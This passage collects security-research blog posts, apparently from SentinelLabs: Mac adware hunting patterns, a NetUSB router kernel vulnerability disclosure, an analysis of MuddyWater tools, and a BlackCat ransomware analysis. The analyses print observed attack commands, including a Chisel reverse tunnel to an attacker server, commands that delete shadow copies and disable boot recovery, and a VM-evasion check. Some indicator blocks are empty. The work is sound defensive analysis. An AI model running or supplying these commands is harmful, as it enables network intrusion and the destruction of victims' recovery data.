Add that to the incentive provided by recent vulnerabilities such as log4j2 that can allow initial access without great technical skill, and enterprise security teams have a recipe for a busy year ahead. Prevention is critical, along with well-documented and tested DRP and BCP procedures. All SentinelOne customers are protected from Rook ransomware.

Indicators of Compromise



T1027.002 – Obfuscated Files or Information: Software Packing
T1007 – System Service Discovery
T1059 – Command and Scripting Interpreter
TA0010 – Exfiltration
T1082 – System Information Discovery
T1490 – Inhibit System Recovery

A Threat Hunter’s Guide to the Mac’s Most Prevalent Adware Infections 2022

4 January 2022 at 18:26

Last month, as we closed out 2021, we shared the most recent malware discoveries afflicting the Mac platform, covering spyware, targeted attacks on developers and activists, cryptocurrency theft and cryptomining. As worrisome as those are, the bulk of infections affecting Mac users in and out of enterprise settings revolve around adware.

Once little more than a minor nuisance, adware on all platforms has taken a darker turn in recent years, often emulating malware TTPs and regularly surpassing a lot of malware families in sophistication and rapid evolution. What’s driven these developments is simple: adware makes a lot of money. Adware also harvests a lot of data from infections which can be sold off to other actors.

Most importantly from a security team’s point of view, however, is that adware infections set up hidden, persistent executables, engage in device and environmental fingerprinting, use anti-removal, anti-analysis and detection avoidance techniques, and reach out to unknown URLs to deliver custom payloads, typically without the knowledge or informed consent of the user or, in the enterprise case, the device owner.

For all these reasons, knowing how to detect an adware infection is no less important than any other malware infection. In this post, we shine a light on the most prevalent adware families affecting the Mac platform over the last 3 months and describe the typical infection patterns for each.

Cataloguing and sharing what we know in this way has two benefits. It enables defenders to improve their immediate detection responses in the short-term, and it represents a cost to threat actors in the mid-term, who are forced to invest in retooling and rethinking their approach.

1. Adload System_Service

Adload has probably been around since 2016 and is the most common family we see in live infections today. We have discussed specific Adload campaigns a few times in the past, here and here and we advise readers to review those posts for earlier Adload indicators. We include in this entry only those that we have not detailed before or which we saw in the last quarter of 2021 and early 2022.

The System_Service campaign remains the most active of current variants that we observe.

These follow a determinate pattern:

Hunting Regex

.*/Library\/Application Support\/\.[0-9]{19,}\/(Services|System)/com\.\w+\.(service|system)\/\w+\.(service|system)


~/Library/Application Support/.15314127506195013446/Services/com.SkilledObject.service/SkilledObject.service
~/Library/Application Support/.16951906660859967924/Services/com.SkilledUnit.service/SkilledUnit.service
/Library/Application Support/.2301650498054541179/System/com.ElementaryType.system/ElementaryType.system

A similar, older but still active pattern does not contain the System or Service terms and does away with the hidden parent folders.


~/Library/Application Support/com.AdvancedRecord/AdvancedRecord
~/Library/Application Support/com.NetDataSearch/NetDataSearch

2. Adload Go Variant (Rload/Lador)

An increasingly common pattern we are seeing throughout late 2021 involves Adload variants written in either Go (aka Rload/Lador) or Kotlin. The Go variants currently drop a payload with the following file path pattern:

Hunting Regex

Library/Application\ Support/com\.\d{19,}\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/_\d{19,21}


/Library/Application Support/com.11592658482052096796.D18B18A4-7ED8-434B-B3A1-6F109CA25EB5/_14139136474173706141
/Library/Application Support/com.2718493167946217159.4E41C598-9C07-4446-96A4-CE22A41B6BF1/_5214250257291383846

Note that the executable file name only contains numerals. Although the underscore prefix is present more often than not in instances we observed, there are cases of this pattern where the underscore is not present.

3. Adload Kotlin Variant

The Kotlin variant of Adload uses a different but still quite distinctive pattern:

Hunting Regex

/Library/Application\ Support/\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}


~/Library/Application Support/.6BA27F8C-697E-4A94-B97C-A0E6AC13F210/.54DA7A17-F1DC-477C-BB31-485FEAC29FE2
~/Library/Application Support/.399CEC38-2BB0-4263-8232-4CCAC933C9E2/.CB273BA5-3138-4274-8C61-B2CBA0F1B671

The Kotlin variants also reach out to a server with the pattern:

Hunting Regex


The wildcard part is consistently made up of two-word patterns that mimic the names seen in the Sytem_Service and earlier Adload campaigns.


4. Other Adload Variants

A pattern seen across a number of different variants involves the Adload installer dropping a Mach-O executable in the /tmp/ directory with a filename prefixed with the letters “php” followed by 6 alphanumeric characters (a similar pattern is used by MaxOfferDeal/Genieo, which we discuss below)

Hunting Regex




A much older pattern that we still see occasionally appearing in live infections has the form:

Hunting Regex

/Library/Application\ Support/com\..*Lookup.*Lookup.*
/Library/Application\ Support/com\..*SearchDaemon.*Search.*


/Library/Application Support/com.OdysseusLookupDaemon/OdysseusLookup
/Library/Application Support/com.ExpertLookupEngineDaemon/ExpertLookupEngine
/Library/Application Support/com.ApolloSearchDaemon/ApolloSearch
/Library/Application Support/com.GlobalToolboxSearchDaemon/GlobalToolboxSearch

There are other minor variants on this naming convention that will be readily recognizable once you are familiar with the above patterns. For more information on this pattern see here.

5. Bundlore, Shlayer, and ZShlayer

Bundlore has been around since at least 2014 and, after Adload, is the most prevalent family we see in live infections throughout 2021 and into the beginning of 2022.

Bundlore payloads are typically dropped by a Shlayer or ZShlayer DMG installer. Often the Shlayer or ZShlayer installer will have one of the following file patterns:

Hunting Regex




Note that in the case of the “Install” pattern, the “I” can appear both as upper and lowercase. We see the “Player” version more often than the “Install” one.

The first-stage Bundlore payload will be dropped in a random folder created in the /tmp/ directory with a corresponding name:

Hunting Regex




Two much older DMG patterns associated with the original Shlayer DMGs, but which we only see on rare occasions now are:

Hunting Regex


6. Pirrit

Pirrit is a macOS malware family that was first seen in 2016 and remained relatively active throughout 2017 but had all but disappeared until November 2021. Since then, Pirrit has seen a new burst of activity.

In common with Bundlore, Pirrit will typically drop via a user executed DMG, although the disk image name and application name tend to be as follows:

/Volumes/Install Flash Player/Install Flash Player

Pirrit’s first stage payload drops in the Darwin_User_Temp_Dir (rather than the system /tmp dir) and uses an 8 character random directory name with either tmp or Installer as a prefix.

Hunting Regex




The next stage of the infection usually drops in the Application Support folder with a random name:

Hunting Regex

~/Library/Application\ Support/com\.[a-z]*/[a-z]*


~/Library/Application Support/com.described/described
~/Library/Application Support/com.memberd/memberd
~/Library/Application Support/com.Searchie/Searchie

A further component is written to a folder in the User’s Library folder or local domain Library folder (depending on available permissions) and contains an application of the same name:

Hunting Regex




This variant of Pirrit appears to be rapidly evolving. A recent sample installed this application inside the Application Support folder:

~/Library/Application Support/com.SearchZen/

Depending on permissions when the infection runs, Pirrit may also install some components into /var/root/.

Behaviorally, Pirrit is a good example of adware that attempts evasion techniques that only become apparent upon execution.

VM Detection/Evasion Behavior

/usr/bin/grep grep -q VirtualBox\|Oracle\|VMware\|Parallels

7. MaxOfferDeal / Genieo

Genieo is another long-standing, common macOS malware family that goes in and out of periods of activity. Late 2021 saw some new variants which we continue to track but we have seen little activity. The most prevalent one on our radar uses a persistent LaunchAgent with the following pattern for its program argument:


~/Library/Application Support/.gettime/GetTime

Interestingly, the persistence file is copied from a /tmp/ file that uses a similar naming pattern to Adload, namely “php” followed by 6 characters. This may be coincidence or deliberate, and either way may have caused some vendors to identify one as the other.

The same regex we showed for Adload Mach-Os above, however, will also find these .plist files.



However, in the Adload case, these files are always Mach-Os, whereas in the MaxOfferDeal/Genieo case they are always property lists. We see no other indicators or similarities between the executable and known Adload variants.

8. MMInstall/MacUpdater

MMInstall has been around since at least early 2018 and typically installs a LaunchAgent with a program argument with variety of names like “MyShopCoupon”, “CouponSmart” and similar. Older forms typically had an executable with the name “mm-install-macos” but we haven’t seen those for some time.

Apple recently updated their XProtect malware signatures for a newer version of this adware threat that appears to have been active during the middle of 2021. The following domains are still currently active:

Hunting regex


The only known installer pattern we have seen to date is as follows.



Most adware arrives in the form of trojanized applications that users are persuaded to attempt to install. Free content, cracked apps, and “special deals” are typical vectors. The fact that some – although by no means all – adware installers make a show of obtaining user consent doesn’t ameliorate the situation: in the cases where that does happen, the consent mechanism is itself often misleading or aggressive.

Regardless of how it is installed, unless the user has permission from the device owner, then adware will almost certainly be unwanted on company-owned devices. Given the aggressive behavior of adware, it should be of no less concern than any other type of malware.

We hope the information in this post will aid security teams to identify and remove adware infections on Mac devices. We would also encourage analysts to become familiar with other useful behavioral indicators associated with a wide range of macOS threats including adware families that can be found here.

CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers

11 January 2022 at 11:56

Executive Summary

  • SentinelLabs has discovered a high severity flaw in the KCodes NetUSB kernel module used by a large number of network device vendors and affecting millions of end user router devices.
  • Attackers could remotely exploit this vulnerability to execute code in the kernel.
  • SentinelLabs began the disclosure process on the 9th of September and the patch was sent to vendors on the 4th of October.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.


As a number of my projects start, when I heard that Pwn2Own Mobile 2021 had been announced, I set about looking at one of the targets. Having not looked at the Netgear device when it appeared in the 2019 contest, I decided to give it a lookover.

While going through various paths through various binaries, I came across a kernel module called NetUSB. As it turned out, this module was listening on TCP port 20005 on the IP

Provided there were no firewall rules in place to block it, that would mean it was listening on the WAN as well as the LAN. Who wouldn’t love a remote kernel bug?

NetUSB is a product developed by KCodes. It’s designed to allow remote devices in a network to interact with USB devices connected to a router. For example, you could interact with a printer as though it is plugged directly into your computer via USB. This requires a driver on your computer that communicates with the router through this kernel module.

It’s licensed to a large number of other vendors for use in their products, most notably:

  • Netgear
  • TP-Link
  • Tenda
  • EDiMAX
  • DLink
  • Western Digital

NetUSB.ko Internals

Back in 2015 a different NetUSB vulnerability was discovered. From that came some great resources (including a very helpful exploit for that vulnerability by bl4sty which helped quickly verify this vulnerability).

The handshake used to initiate a connection is as follows:​​

The handshake that initializes communication

After the handshake, a command-parsing while-loop is executed that contains the following code:

The code that takes a command number and routes the message to the appropriate SoftwareBus function

SoftwareBus_fillBuf acts in a similar way to recv by taking both a buffer and its size, filling the buffer with data read from the socket.

The Vulnerability

The command 0x805f reaches the following code in the function SoftwareBus_dispatchNormalEPMsgOut:

The vulnerable segment of code in the kernel module

4 bytes are fetched from the remote PC. The number 0x11 is added to it and then used as a size value in kmalloc. Since this supplied size isn’t validated, the addition of the 0x11 can result in an integer overflow. For example, a size of 0xffffffff would result in 0x10 after 0x11 has been added to it.

This allocated region is then used and written to through both dereferencing and through the SoftwareBus_fillBuf function:

Out-of-bounds writes taking place on the small allocated region

Looking at the final call to SoftwareBus_fillBuf, the supplied size is used as a maximum value to read from the remote socket. From the previous example, the size 0xffffffff would be used here (not the overflown value) as the size sent to recv.

Along with our report, we sent a suggested mitigation strategy. Before allocating memory with user supplied sizes, an integer overflow check should be performed, as so:

if(user_supplied_size + 0x11 


From an exploit perspective, there are a number of things to consider.

First, the minimum size we can allocate is 0x0 and the maximum is 0x10. That means that the allocated object will always be in the kmalloc-32 slab of the kernel heap.

Second, we need to consider the amount of control over the overflow itself. We already know that the data being received over the socket is within control of the attacker, but is the size negotiable in any way? Since a size of 0xffffffff is not realistically exploitable on a 32-bit system, it’s necessary to take a look at how SoftwareBus_fillBuf actually works. Underneath this function is the standard socket recv function. That means that the size supplied is only used as a maximum receive size and not a strict amount, like memcpy.

It’s also important to consider how easy it is going to be to lay out the kernel heap for the overflow. Many exploits require the use of heap holes in order to make sure that the vulnerable heap structure will be placed before the object that will be overwritten. In the case of this kernel module, there’s a timeout of 16 seconds on the socket for receiving data, meaning the struct can be overflown up to 16 seconds after it is allocated. This removes the need to create a heap hole.

Finally, the selection of target structures that could be overwritten needs to be considered. There are some constraints as to which ones can be used.

  • The structure must be less than 32 bytes in size in order to fit into kmalloc-32.
  • The structure must be sprayable from a remote perspective.
  • The structure must have something that can be overwritten that makes it useful as a target (e.g. a Type-Length-Value structure or a pointer)

While these restrictions make it difficult to write an exploit for this vulnerability, we believe that it isn’t impossible and so those with Wi-Fi routers may need to look for firmware updates for their router.


Since this vulnerability is within a third party component licensed to various router vendors, the only way to fix this is to update the firmware of your router, if an update is available. It is important to check that your router is not an end-of-life model as it is unlikely to receive an update for this vulnerability.

Exploring the Netgear firmware update, the vulnerability was patched by adding a new size check to the function:

The patch for the vulnerability, as implemented by Netgear


This vulnerability affects millions of devices around the world and in some instances may be completely remotely accessible. Due to the large number of vendors that are affected by the vulnerability, we reported this vulnerability directly to KCodes to be distributed among their licensees instead of targeting just the TP-Link or the Netgear device in the contest. This ensures that all vendors receive the patch instead of just one during the contest.

While we are not going to release any exploits for it, there is a chance that one may become public in the future despite the rather significant complexity involved in developing one. We recommend that all users follow the remediation information above in order to reduce any potential risk.

Disclosure Timeline

  • 09 Sep, 2021 - An initial email to KCodes, requesting information on how to send the vulnerability information
  • 20 Sep, 2021 - The vulnerability details and a patch suggestion is disclosed to KCodes with a final disclosure date of December 20, 2021
  • 04 Oct, 2021 - A proof-of-concept script is requested by KCodes to verify the patch
  • 04 Oct, 2021 - A proof-of-concept script is provided
  • 17 Nov, 2021 - An email is sent to KCodes to double check that the patch was sent out to all vendors on the 4th of October, and not just Netgear
  • 19 Nov, 2021 - KCodes confirms that they had sent the patch to all vendors and that the firmware would be out before the 20th December
  • 14 Dec, 2021 - Netgear was found to have released firmware for the R6700v3 device with the changes implemented
  • 20 Dec, 2021 - Netgear releases an advisory for the vulnerability
  • 11 Jan, 2022 - SentinelLabs publicly disclose details of the vulnerability

SentinelOne’s responsible disclosure policy can be found here.

Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor

12 January 2022 at 21:25


MuddyWater is commonly considered an Iranian state-sponsored threat actor but no further granularity has previously been available. As of January 12th, 2022, U.S. CyberCommand has attributed this activity to the Iranian Ministry of Intelligence (MOIS). While some cases allow for attribution hunches, or even fleshed out connections to handles and online personas, attribution to a particular government organization is often reserved to the kind of visibility only available to governments with a well-developed all-source and signals intelligence apparatus.

As in all cases of public government attribution, we take this as an opportunity to reassess our assumptions about a given threat actor all the while recognizing that we can’t independently verify the basis for this claim.

U.S. Cyber Command pointed to multiple malware sets used by MuddyWater. Among those, PowGoop correlates with activities we’ve triaged in recent incidents. We hope sharing relevant in-the-wild findings will further bolster our collective defense against this threat.

Iranian MOIS hacker group #MuddyWater is using a suite of malware to conduct espionage and malicious activity. If you see two or more of these malware on your network, you may have MuddyWater on it: Attributed through @NCIJTF @FBI

— USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) January 12, 2022

Analysis of New PowGoop Variants

PowGoop is a malware family first described by Palo Alto which utilizes DLL search order hijacking (T1574.001). The name derives from the usage ‘GoogleUpdate.exe‘ to load a malicious modified version of ‘goopdate.dll‘, which is used to load a malicious PowerShell script from an external file. Other variants were described by ClearSkySec and Symantec.

We identified newer variants of PowGoop loader that involve significant changes, suggesting the group continues to use and maintain it even after recent exposures. The new variants reveal that the threat group has expanded its arsenal of legitimate software used to load malicious DLLs. Aside from ‘GoogleUpdate.exe’, three additional benign pieces of software are abused in order to sideload malicious DLLs: ‘Git.exe’, ‘FileSyncConfig.exe’ and ‘Inno_Updater.exe’.

Each contains a modified DLL and a renamed authentic DLL. The hijacked DLL contains imports originating from its renamed counterpart, as well as two additional functions written by the attackers. The list of hijacked DLLs is presented below:

Software Name Hijacked DLL Renamed DLL
GoogleUpdate.exe goopdate.dll goopdate86.dll
inno_updater.exe vcruntime140.dll vcruntime141.dll
FileSyncConfig.exe vcruntime140.dll vcruntime141.dll
git.exe libpcre2-8-0.dll libpcre2-8-1.dll

Unlike previous versions, the hijacked DLLs attempt to reflectively load two additional files, one named ‘Core.dat’, which is a shellcode called from the export ‘DllReg’ and the other named ‘Dore.dat’, which is a PE file with a `MZRE` header, allowing it to execute as a shellcode as well, similarly to the publicly reported techniques, called from the export ‘DllRege’.

Those two ‘.dat’ files are identical for each of the hijacked DLLs and are both executed using rundll32 on their respective export, which reads the file from disk to a virtually allocated buffer, followed by a call to offset 0 in the read data.

Both ‘Dore.dat’ and ‘Core.dat’ search for a file named ‘config.txt’ and run it using PowerShell in a fashion similar to older versions (T1059.001). The overlap in functionality between the two components is not clear; however, it is evident that ‘Core.dat’ represents a more mature and evolved version of PowGoop as it is loaded as a shellcode, making it less likely to be detected statically.

It is also worth noting that it is not necessary for both components to reside on the infected system as the malware will execute successfully with either one. Given that, it is possible that one or the other could be used as a backup component. The PowerShell payloads within ‘config.txt’ could not be retrieved at the time of writing.

Execution flow of new PowGoop variants
Execution flow of new PowGoop variants

MuddyWater Tunneling Activity

The operators behind MuddyWater activities are very fond of tunneling tools, as described in several recent blog posts(T1572). The custom tools used by the group often provide limited functionality, and are used to drop tunneling tools which enable the operators to conduct a wider set of activities. Among the tunneling tools MuddyWater attackers were observed using are Chisel, SSF and Ligolo.

The nature of tunneling activities is often confusing. However, analysis of Chisel executions by MuddyWater operators on some of the victims helps clarify their usage of such tools. This is an example of a command executed by the attackers on some of the victims:

 SharpChisel.exe client xx.xx.xx.xx:8080 r:8888:

The “r” flag used in the client execution implies the server is running in “reverse” mode. Setting the --reverse flag, according to Chisel documentation, “allows clients to specify reverse port forwarding remotes in addition to normal remotes”.

In this case, the “SharpChisel.exe” client runs on the victim machine, connects back to the Chisel server over port 8080, and specifies to forward anything coming over port 8888 of the server to port 9999 of the client.

This might look odd at first sight as port 9999 is not normally used on Windows machines and is not bound to any specific service. This is clarified shortly afterwards as the reverse tunnel is followed by setting up a Chisel SOCKS5 server on the victim, waiting for incoming connections over port 9999:

SharpChisel.exe server -p 9999 --socks5

By setting up both a server and a client instance of Chisel on the machine, the operators enable themselves to tunnel a variety of protocols which are supported over SOCKS5. This actually creates a tunnel within a tunnel. Given that, it is most likely the operator initiated SOCKS traffic to the server over port 8888, tunneling traffic from applications of interest to inner parts of the network.

The usage of Chisel and other tunneling tools effectively enable the threat actor to connect to machines within target environments as if they were inside the operator LAN.

Summary of MuddyWater tunneling using Chisel
Summary of MuddyWater tunneling using Chisel

Exchange Exploitation

When tracking MuddyWater activity, we came across an interesting subset of activity targeting Exchange servers of high-profile organizations. This subset of Exchange exploitation activity is rather interesting, as without context it would be difficult to attribute it to MuddyWater because the activity relies almost completely on publicly available offensive security tools.
The attackers attempt to exploit Exchange servers using two different tools:

  • A publicly available script for exploiting CVE-2020-0688 (T1190)
  • Ruler – an open source Exchange exploitation framework

CVE-2020-0688 Exploitation

Analysis of the activity observed suggests the MuddyWater threat group attempted to exploit CVE-2020-0688 on governmental organizations in the Middle East. The exploit enables remote code execution for an authenticated user. The specific exploit MuddyWater operators were attempting to run was utilized to drop a webshell.

The attempted webshell drop was performed using a set of PowerShell commands that write the webshell content into a specific path “/ecp/HybridLogout.aspx“. The webshell awaits the parameter “cmd” and runs the commands in it utilizing XSL Script Processing (T1220).

A snippet of the webshell MuddyWater attempted to upload to Exchange servers
A snippet of the webshell MuddyWater attempted to upload to Exchange servers

This activity is highly correlated with a CVE-2020-0688 exploitation script from a Github repository named The script utilizes CVE-2020-0688 to upload an ASPX webshell to the path : “/ecp/HybridLogout.aspx” (T1505.003). It is also one of the only publicly available CVE-2020-0688 implementations that drop a web shell.

A snippet of CVE-2020-0688 exploitation script
A snippet of CVE-2020-0688 exploitation script

Ruler Exploitation

Among other activities performed by the threat actors was attempted Ruler exploitation. The instance identified targeted a telecommunication company in the Middle East. The observed activity suggests the threat actor attempted to create malicious forms, which is one of the most common usages of Ruler (T1137.003).

Usage of Ruler was previously associated with other Iranian threat actors, most commonly with APT33.


Analysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques. While still relying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing new techniques to avoid detection. This is observed through the three distinct activities observed and analyzed in this report: The evolution of the PowGoop malware family, the usage of tunneling tools, and the targeting of Exchange servers in high-profile organizations.

Like many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups. Even so, it appears MuddyWater’s persistency is a key to their success, and their lack of sophistication does not appear to prevent them from achieving their goals.

Indicators of Compromise

PowGoop variants (MD5, SHA1, SHA256)

  • Goopdate.dll
    • A5981C4FA0A3D232CE7F7CE1225D9C7E
    • 8FED2FF6B739C13BADB14C1A884D738C80CB6F34
    • AA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94
  • Libpcre2-8-0.dll
    • F8E7FF6895A18CC3D05D024AC7D8BE3E
    • 97248B6E445D38D48334A30A916E7D9DDA33A9B2
    • F1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3
  • Vcruntime140.dll
    • CEC48BCDEDEBC962CE45B63E201C0624
    • 81F46998C92427032378E5DEAD48BDFC9128B225
    • DD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92
  • Core.dat
    • A65696D6B65F7159C9FFCD4119F60195
    • 570F7272412FF8257ED6868D90727A459E3B179E
    • B5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504
  • Dore.dat
    • 6C084C8F5A61C6BEC5EB5573A2D51FFB
    • 61608ED1DE56D0E4FE6AF07ECBA0BD0A69D825B8
    • 7E7545D14DF7B618B3B1BC24321780C164A0A14D3600DBAC0F91AFBCE1A2F9F4


  • T1190 – Exploit Public-Facing Application
  • T1572 – Protocol Tunneling
  • T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking
  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1505.003 – Server Software Component: Web Shell
  • T1220 – XSL Script Processing

BlackCat Ransomware | Highly-Configurable, Rust-Driven RaaS On The Prowl For Victims

18 January 2022 at 17:40

BlackCat (aka AlphaVM, AlphaV) is a newly established RaaS (Ransomware as a Service) with payloads written in Rust. While BlackCat is not the first ransomware written in the Rust language, it joins a small (yet growing) sliver of the malware landscape making use of this popular cross-platform language.

First appearing in late November, BlackCat has reportedly been attacking targets in multiple countries, including Australia, India and the U.S, and demanding ransoms in the region of $400,000 to $3,000,000 in Bitcoin or Monero.

BlackCat Ransomware Overview

In order to attract affiliates, the authors behind BlackCat have been heavily marketing their services in well-known underground forums.

BlackCat operators maintain a victim blog as is standard these days. The blog hosts company names and any data leaked in the event that the victims do not agree to cooperate.

Current data indicates primary delivery of BlackCat is via 3rd party framework/toolset (e.g., Cobalt Strike) or via exposed (and vulnerable) applications. BlackCat currently supports both Windows and Linux operating systems.

BlackCat Configuration Options

Samples analyzed (to date ) require an “access token” to be supplied as a parameter upon execution. This is similar to threats like Egregor, and is often used as an anti-analysis tactic. This ‘feature’ exists in both the Windows and Linux versions of BlackCat.

However, the BlackCat samples we analyzed could be launched with any string supplied as the access token. For example:

Malware.exe -v --access-token 12345

The ransomware supports a visible command set, which can be obtained via the -h or --help parameters.

BlackCat command line options

As seen above, the executable payloads support a variety of commands, many of which are VMware-centric.

 --no-prop                                  Do not self propagate(worm) on Windows
 --no-prop-servers <NO_PROP_SERVERS>        Do not propagate to defined servers
 --no-vm-kill                               Do not stop VMs on ESXi
 --no-vm-snapshot-kill                      Do not wipe VMs snapshots on ESXi
 --no-wall                                  Do not update desktop wallpaper on Windows

In verbose mode (-v) the following output can be observed upon launch of the BlackCat payloads:

BlackCat ransomware run in verbose mode

BlackCat Execution and Encryption Behaviour

Immediately upon launch, the malware will attempt to validate the existence of the previously mentioned access-token, followed by querying for the system UUID (wmic).

Those pieces of data are concatenated together into what becomes the ‘Access key’ portion of their recovery URL displayed in the ransom note. In addition, on Windows devices, BlackCat attempts to delete VSS (Volume Shadow Copies) as well as enumerate any accessible drives to search for and encrypt eligible files.

Other configuration parameters are evaluated before proceeding to execute multiple privilege escalation methods, based on the OS identified by wmic earlier. These methods are visible at the time of execution and include the use of the Com Elevation Moniker.

It is at this point that BlackCat will attempt to terminate any processes or services listed within the configuration such as any processes which may inhibit the encryption process. There are also specific files and directories that are excluded from encryption. Much of this is configurable at the time of building the ransomware payloads.

The targeted processes and services are noted in the kill_processes and kill_services sections respectively. File and folder exclusions are handled in the exclude directory_names section.

To further illustrate, the following were extracted from sample ​d65a131fb2bd6d80d69fe7415dc1d1fd89290394/​74464797c5d2df81db2e06f86497b2127fda6766956f1b67b0dcea9570d8b683:


backup memtas mepocs msexchange
sql svc$ veeam vss


agntsvc dbeng50 dbsnmp encsvc
excel firefox infopath isqlplussvc
msaccess mspub mydesktopqos mydesktopservice
notepad ocautoupds ocomm ocssd
onenote oracle outlook powerpnt
sqbcoreservice sql steam synctime
tbirdconfig thebat thunderbird visio
winword wordpad xfssvccon


$recycle.bin $windows.~bt $windows.~ws 386
adv all users ani appdata
application data autorun.inf bat bin
boot boot.ini bootfont.bin bootsect.bak
cab cmd com config.msi
cpl cur default deskthemepack
diagcab diagcfg diagpkg dll
drv exclude_file_extensions:[themepack exclude_file_names:[desktop.ini exe
google hlp hta icl
icns ico iconcache.db ics
idx intel key ldf
lnk lock mod mozilla
mpa msc msi msocache
msp msstyles msu] nls
nomedia ntldr ntuser.dat ntuser.dat.log]
ntuser.ini ocx pdb perflogs
prf program files program files (x86) programdata
ps1 public rom rtp
scr shs spl sys
system volume information theme thumbs.db tor browser
windows windows.old] wpx

BlackCat also spawns a number of its own processes, with syntax (for Windows) as follows:

 WMIC.exe (CLI interpreter)   csproduct get UUID
 cmd.exe (CLI interpreter)   /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"
 cmd.exe (CLI interpreter)   /c "wmic csproduct get UUID"
 cmd.exe (fsutil.exe)        /c "fsutil behavior set SymlinkEvaluation R2L:1"
 fsutil.exe                  behavior set SymlinkEvaluation R2L:1
 cmd.exe (fsutil.exe)        /c "fsutil behavior set SymlinkEvaluation R2R:1"

The fsutil-based modifications are meant to allow for use of both remote and local symlinks. BlackCat enables ‘remote to local’ and ‘remote to remote’ capability.

 fsutil.exe                     behavior set SymlinkEvaluation R2R:1
 cmd.exe (vssadmin.exe)         /c "vssadmin.exe delete shadows /all /quiet"
 reg.exe (CLI interpreter)      add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f

 cmd.exe (worldwideStrata.exe)  /c "C:\Users\admin1\Desktop\worldwideStrata.exe" --child
 vssadmin.exe                   delete shadows /all /quietcmd.exe (ARP.EXE) /c "arp -a"

Some more recently-built copies have a few additions. For example, in sample c1187fe0eaddee995773d6c66bcb558536e9b62c/c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40 we see the addition of:

 wmic.exe Shadowcopy Delete"
 "iisreset.exe /stop"
 bcdedit.exe /set {default} recoveryenabled No

Much like other fine details, all this can be adjusted or configured by the affiliates at the time of building the payloads.

BlackCat configurations are not necessarily tailored to the target operating system. In the Linux variants we have analyzed to date, there are Windows-specific process, service, and file references in the kill_processes, kill_services, and exclude_directory_names.

The following excerpt is from sample f8c08d00ff6e8c6adb1a93cd133b19302d0b651afd73ccb54e3b6ac6c60d99c6.

Linux variant configuration

Specific encryption logic is not necessarily novel either and is somewhat configurable by the affiliate at the time of building the ransomware payloads. BlackCat supports both ChaCha20 and AES encryption schemes.

Extensions on encrypted files can vary across samples. Examples observed include .dkrpx75, .kh1ftzx and .wpzlbji.

BlackCat ransomware execution chain (Windows version)

Post-Infection, Payment and Portal

Infected clients will be greeted with a ransom note as well as a modified desktop image.

BlackCat’s modified desktop image

Infected uses are instructed to connect to the attackers’ payment portal via TOR.

BlackCat ransom note

The ransom note informs the victim that not only have files been encrypted but data has been stolen.

Victim’s are threatened with data leakage if they refuse to pay and provided with a list of data types that have been stolen.

In theory, once victims connect to the attacker’s portal, they are able to communicate and potentially acquire a decryption tool. Everything on the BlackCat portal is tied back to the specific target ID, which must be supplied correctly from the URL in the ransom note.


In its relatively short time on the radar, BlackCat has carved a notable place for itself amongst mid-tier ransomware actors. This group knows their craft and are cautious when selecting partners or affiliates. It is possible that some of the increased affiliation and activity around BlackCat is attributed to other actors migrating to BlackCat as larger platforms fizzle out (Ryuk, Conti, LockBit and REvil).

Actors utilizing BlackCat know their targets well and make every attempt to stealthily compromise enterprises. Prevention by way of powerful, modern, endpoint security controls are a must. The SentinelOne Singularity Platform is capable of detecting and preventing BlackCat infections on both Windows and Linux endpoints.

Indicators of Compromise



T1027.002 – Obfuscated Files or Information: Software Packing
T1027 – Obfuscated Files or Information
T1007 – System Service Discovery
T1059 – Command and Scripting Interpreter
TA0010 – Exfiltration
T1082 – System Information Discovery
T1490 – Inhibit System Recovery
T1485 – Data Destruction
T1078 – Valid Accounts
T1486 – Data Encrypted For Impact
T1140 – Encode/Decode Files or Information
T1202 – Indirect Command Execution
T1543.003 – Create or Modify System Process: Windows Service
T1550.002 – Use Alternate Authentication Material: Pass the Hash

Hacktivism and State-Sponsored Knock-Offs | Attributing Deceptive Hack-and-Leak Operations

27 January 2022 at 18:59

There’s a seductive allure to the story that hacking can be a force for good, a way to tip the scales in favor of an underdog equipped with little more than a terminal, elite skills, and good intentions. In previous decades, what passed for hacktivism was little more than pointed website defacements and distributed denial of service attacks. Basically, politically motivated nuisances. They made their presence known, but their long-term impact was negligible. A post-Wikileaks era emphasized the power of hack-and-leak operations as a suitable lever for real-world impact of the sort hacktivists had sought for a long time. And it inevitably became the de facto standard for the greyhat vigilante.

The idea of hacktivists out there looking to settle the score against oppressive regimes is alluring in the same way that a grassroots revolution, a cohesive outcry of an oppressed people against their oppressors, is alluring. But the two aren’t equivalent.

A politically motivated hacking operation is not representative of a societal quorum. Technological skills and means are an amplifier that can give a handful of individuals an outsized voice and while that may be used to advance a moral cause, it’s also a great cover for action for established state-sponsored actors to influence sentiment and outcomes all over the world.

All of which begs the questions, are there still real hacktivists out there or are they all a cover for state-sponsored operations? Have we learned enough from previous run-ins to improve our analysis processes when approaching these potential deception operations?

Focus on this topic was motivated by our discovery of MeteorExpress and the rise of the Belarusian Cyber Partisans as a force opposing the Lukashenko regime. Both are widely different cases of hacktivism, with the former exhibiting inauthentic traits while the latter makes for a more convincing example of a grassroots endeavor.

